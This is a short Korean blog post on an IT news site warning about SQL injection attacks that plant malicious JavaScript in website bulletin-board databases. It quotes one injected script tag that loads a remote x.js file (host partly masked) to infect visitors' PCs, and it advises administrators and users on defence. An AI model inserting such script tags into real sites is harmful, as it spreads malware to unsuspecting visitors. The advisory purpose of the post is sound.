![[레벨:52]](http://www.itviewpoint.com/modules/point/icons/warrock/52.gif "포인트:250780point (78%), 레벨:52/100"){kind=icon}
떡이떡이SQL 인젝션, .js로 된 특정 악성코드를 html 형태로 게시판 데이터베이스에 무차별 삽입해 버리는 공격에 대해서는
http://itviewpoint.com/56766
위 두 링크를 통해 소개해 드린 바 있습니다. sql의 취약점을 노린 것으로, (1)대량으로 자료가 변조된다는 점에서, (2)또한 악성코드의 숙주로 둔갑할 수 있다는 점에서 사실 매우 심각하죠. UN등 주요 글로벌 기관의 홈페이지도 유린당한 적이 있을 정도입니다.
그런데 최근 또 이런게 말썽인가 봅니다.
무비X지 해킹 건 http://www.ziwoogae.com/1183
<script src=http://www.*****.com.tw/x.js></script>
삽입이 된 뒤에 악성코드를 내려받도록 하는 방식입니다. 처음에 "x.js를 링크시켜 스크립스 실행을 시키고" 부분이 지나면 순식간에 은밀히 해당 PC를 감염시킵니다. 그 이후에는 어떤 일이 일어나는지 알 수 없는 셈이죠.
링크를 참고하시고 서버 관리자분들은 x.js 삽입을 통제하고, 일반 사용자들은 운영체제 보안패치 등에 각별히 유의하시기 바랍니다.
얼리어답터 카테고리의 다른 글
안녕하세요. ITViewpoint 스타터이자 공동 에디터 '서명덕 기자' 입니다. 닉네임은 떡이떡이 입니다.
이 곳은 블로그미디어이며, 개인 공간은 http://itviewpoint.thoth.kr/ 을 메인으로 옮겨 갈 생각입니다.
개인적인 목적이라면 콘텐츠 막펌을 전면 허용 http://itviewpoint.com/blog/54971 합니다. 다만 비상업적인 용도에 한하며, 상업적인 용도라면 별도로 문의하세요. RSS http://itviewpoint.com/blog/rss 는 전문 제공합니다.
![[레벨:17]](http://www.itviewpoint.com/modules/point/icons/warrock/17.gif "포인트:26275point (8%), 레벨:17/100"){kind=icon}
thoth
Recent Comments